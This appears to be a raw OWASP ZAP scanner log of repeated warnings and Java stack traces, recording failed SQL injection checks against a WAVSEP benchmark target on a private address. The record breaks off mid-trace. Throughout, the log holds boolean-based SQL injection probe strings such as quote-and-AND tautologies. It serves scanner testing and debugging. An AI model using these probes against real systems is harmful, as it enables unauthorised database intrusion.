WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 3070=1691] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 3070=1691 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681207 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8505=8505] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 8505=8505 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681208 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 4512=4512 AND ('pxVx'='pxVx] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 4512=4512 AND ('pxVx'='pxVx at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681209 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 3070=1691] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 3070=1691 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681209 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 9438=1674 AND ('mOVb'='mOVb] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 9438=1674 AND ('mOVb'='mOVb at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681210 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 6299=6579 AND ('oyLo'='oyLo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 6299=6579 AND ('oyLo'='oyLo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681210 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 6297=6282 AND 'XjJX'='XjJX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 6297=6282 AND 'XjJX'='XjJX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681211 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 6762=6762 AND ('mJSL'='mJSL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 6762=6762 AND ('mJSL'='mJSL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681211 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8172=8172 AND 'TTmz'='TTmz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 8172=8172 AND 'TTmz'='TTmz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681212 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 6297=6282 AND 'XjJX'='XjJX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 6297=6282 AND 'XjJX'='XjJX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681212 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 6299=6579 AND ('oyLo'='oyLo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 6299=6579 AND ('oyLo'='oyLo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681213 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 7035=2013 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 7035=2013 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681214 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 8189=4057 AND 'uavl'='uavl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 8189=4057 AND 'uavl'='uavl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681214 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 2420=2420 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 2420=2420 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681215 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 2752=2752 AND 'Gnpd'='Gnpd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 2752=2752 AND 'Gnpd'='Gnpd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 